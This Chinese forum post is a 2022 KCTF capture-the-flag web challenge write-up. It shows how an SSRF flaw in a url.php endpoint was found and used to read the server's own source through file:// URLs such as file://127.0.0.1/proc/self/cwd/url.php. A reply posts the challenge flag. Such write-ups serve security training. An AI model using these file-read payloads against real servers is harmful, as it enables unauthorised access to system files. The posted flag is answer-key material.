首页
社区
课程
招聘
[原创]2022 KCTF-WEB 出题思路
发表于: 2022-5-1 20:30 10172

[原创]2022 KCTF-WEB 出题思路

2022-5-1 20:30
10172

打开首页显示(我打开的是测试页面)

查看源码得到两个个链接

http://101.89.140.207:8044/phpinfo.php phpinfo的信息,暂时不知道有什么用


http://101.89.140.207:8044/url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png

感觉是请求了图片显示在页面,猜测可能有SSRF漏洞


测试http://101.89.140.207:8044/url.php?url=https://www.baidu.com

返回error,猜测可能限制了域名


测试http://101.89.140.207:8044/url.php?url=127.0.0.1/index.php

返回host is null,搞不清楚什么情况,试试读文件


http://101.89.140.207:8044/url.php?url=file:///proc/self/cwd/url.php

返回host is null


通过链接:view-source:http://101.89.140.207:8044/url.php?url=file://127.0.0.1/proc/self/cwd/url.php

成功读取到代码

原来是使用了curl,同时发现了一个新的被注释掉的地址http://123.57.254.42/flag.php 



[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2022-5-17 12:04 被kanxue编辑 ,原因:
收藏
免费 4
支持
分享
最新回复 (1)
雪    币: 50161
活跃值: (20665)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
2

第四题 飞蛾扑火   
flag{xxx_999()xx*@eeEEE}

最后于 2022-5-17 12:01 被kanxue编辑 ,原因:
2022-5-9 12:03
0
游客
登录 | 注册 方可回帖
返回
//